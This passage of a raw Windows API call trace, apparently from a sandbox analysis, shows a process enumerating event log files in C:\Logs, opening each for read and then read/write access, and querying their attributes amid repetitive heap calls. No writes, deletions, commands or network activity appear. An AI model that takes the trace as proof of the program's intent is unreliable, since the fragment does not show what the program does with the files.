Size=0x20) returned 0x883b0 [0087.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0087.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693a0 [0087.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0087.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46898 [0087.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693a0 | out: hHeap=0x20000) returned 1 [0087.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0087.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0087.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0087.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0087.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0087.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0087.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0087.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0087.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0087.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0087.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0087.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0087.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0087.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0087.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0087.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0087.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0087.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0087.425] AreFileApisANSI () returned 1 [0087.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx", lpUsedDefaultChar=0x0) returned 54 [0087.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0087.426] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.426] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0087.426] AreFileApisANSI () returned 1 [0087.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0087.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76020 [0087.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=54 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 54 [0087.426] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.426] GetFileType (hFile=0x424) returned 0x1 [0087.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0087.426] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.427] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.427] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.427] CloseHandle (hObject=0x424) returned 1 [0087.427] AreFileApisANSI () returned 1 [0087.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0087.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75be8 [0087.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x75be8, cchWideChar=54 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 54 [0087.427] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.427] GetFileType (hFile=0x424) returned 0x1 [0087.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0087.427] CloseHandle (hObject=0x424) returned 1 [0087.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0087.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0087.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0087.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0087.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0087.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0087.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0087.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0087.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0087.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0087.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0087.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0087.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0087.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0087.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0087.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0087.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0087.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0087.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.428] AreFileApisANSI () returned 1 [0087.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0087.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75b70 [0087.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=54 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 54 [0087.428] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb151873, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb151873, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0087.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0087.428] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.428] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.429] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb177aca, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb177aca, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-SMBServer%4Security.evtx", cAlternateFileName="MI7709~1.EVT")) returned 1 [0087.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0087.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0087.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0087.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0087.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0087.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46278 [0087.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0087.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0087.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0087.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0087.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0087.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0087.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0087.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0087.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0087.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0087.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0087.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0087.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0087.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0087.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0087.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0087.429] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.429] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.429] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.430] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0087.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0087.430] AreFileApisANSI () returned 1 [0087.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx", lpUsedDefaultChar=0x0) returned 51 [0087.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0087.430] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.430] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0087.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0087.430] AreFileApisANSI () returned 1 [0087.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0087.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x467b8 [0087.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x467b8, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 51 [0087.430] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.430] GetFileType (hFile=0x424) returned 0x1 [0087.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0087.430] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.431] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.431] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.431] CloseHandle (hObject=0x424) returned 1 [0087.431] AreFileApisANSI () returned 1 [0087.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0087.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x45fd8 [0087.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x45fd8, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 51 [0087.431] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.431] GetFileType (hFile=0x424) returned 0x1 [0087.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0087.432] CloseHandle (hObject=0x424) returned 1 [0087.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0087.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0087.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0087.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0087.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0087.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0087.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0087.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0087.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0087.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0087.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0087.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0087.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0087.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0087.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0087.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0087.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0087.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0087.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.432] AreFileApisANSI () returned 1 [0087.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0087.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46ac8 [0087.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46ac8, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 51 [0087.432] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb177aca, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb177aca, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0087.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0087.433] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.433] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.433] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd751ea61, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd751ea61, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Store%4Operational.evtx", cAlternateFileName="MICEDD~1.EVT")) returned 1 [0087.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0087.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68e00 [0087.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0087.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0087.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e00 | out: hHeap=0x20000) returned 1 [0087.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0087.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0087.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0087.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0087.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0087.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0087.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.433] HeapFree (in: 